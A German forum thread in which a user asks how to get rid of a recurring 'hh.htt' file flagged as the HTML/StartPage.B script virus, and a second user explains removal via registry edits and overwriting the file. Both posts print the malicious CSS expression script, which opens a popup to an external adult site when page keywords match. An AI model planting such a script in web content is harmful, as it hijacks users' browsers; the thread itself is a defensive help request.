Virus ist nach dem löschen wieder da

Internet Internet Sicherheit
1

Hallo WerWeissWas´ler,

habe mir einen Virus eingefangen. Der Virus liegt in der Datei „hh.htt“ 1 kb groß. Es handelt sich um eine HyperText Template Datei. Diese liegt im Windows-Verzeichnis. Wenn diese gelöscht wird, baut sie sich automatisch beim nächsten Aufruf des Explorers wieder auf. Das Virus-Programm AntiVir Personal Edition findet diese Datei und löscht sie dann auch. Der Inhalt dieser Virusdatei lautet:

body{border-color:expression(dMT=document.getElementsByTagName(‚META‘),dMT.length?(dMT.keywords?(dMTkc=dMT.keywords.content,(dMTkc.indexOf(‚sex‘)>=0||dMTkc.indexOf(‚porn‘)>=0||dMTkc.indexOf(‚adult‘)>=0||dMTkc.indexOf(‚thehun‘)>=0)?(window.open(‚http://(hier habe ich den Eintrag geändert)aifind.info/adult.htm‘,‚hvo‘,‚x=5,top=5,y=5,left=5,height=600,width=800,directories=no,toolbar=no,status=no,location=no,resizable=no,menubar=no,scrollbars=no‘)?document.getElementsByTagName(‚META‘).keywords.content=’’:’’):’’):’’):’’)}

Das Virus-Programm meldet folgenden Fehler:

Die Datei hh.htt enthält Signatur des HTML-Scriptvirus HTML/StartPage.B Soll diese Datei gelöscht werden?

Weiß hier jemand Rat, wie man es unterbindet, dass sich beim Aufruf vom Explorer, diese Datei nicht mehr von selbst installiert?

Dank im voraus
Gruß G. Stein

2

Hallo Gregor,

wenn Du Dich ein bisschen mit dem Bearbeiten von Registry-Einträgen auskennst, solltest Du „ihn“ problemlos anhand folgender Info „restlos“ entfernen können:

http://www.sophos.de/virusinfo/analyses/trojstartpgb…

Die Registry sinnvollerweise OFFLINE erst sichern (Programm: SCANREGW.EXE), danach editieren und zuletzt die HH.HTT entfernen.

Solltest Du beim Ansurfen von o.g. Seite Probleme haben, dann editiere den Inhalt der Datei:

body{border-color:expression(dMT=document.getElementsByTagName
(‚META‘),dMT.length?(dMT.keywords?(dMTkc=dMT.keywords.content,
(dMTkc.indexOf(‚sex‘)>=0||dMTkc.indexOf(‚porn‘)>=0||dMTkc.indexOf
(‚adult‘)>=0||dMTkc.indexOf(‚thehun‘)>=0)?(window.open(‚http://(hier
habe ich den Eintrag geändert)
aifind.info/adult.htm‘,‚hvo‘,‚x=5,top=5,y=5,left=5,height=600,
width=800,directories=no,toolbar=no,status=no,location=no,
resizable=no,menubar=no,scrollbars=no‘)?
document.getElementsByTagName
(‚META‘).keywords.content=’’:’’):’’):’’):’’)}

…überschreibe alle Buchstaben mit Leerzeichen und speichere diese HH.HTT wieder, und wenn möglich mit ganz genau derselben Grösse in Bytes! (Rechtsklick im Explorer > Eigenschaften)

Ich hoffe, das hilft.

Gruss & CU DannyFox64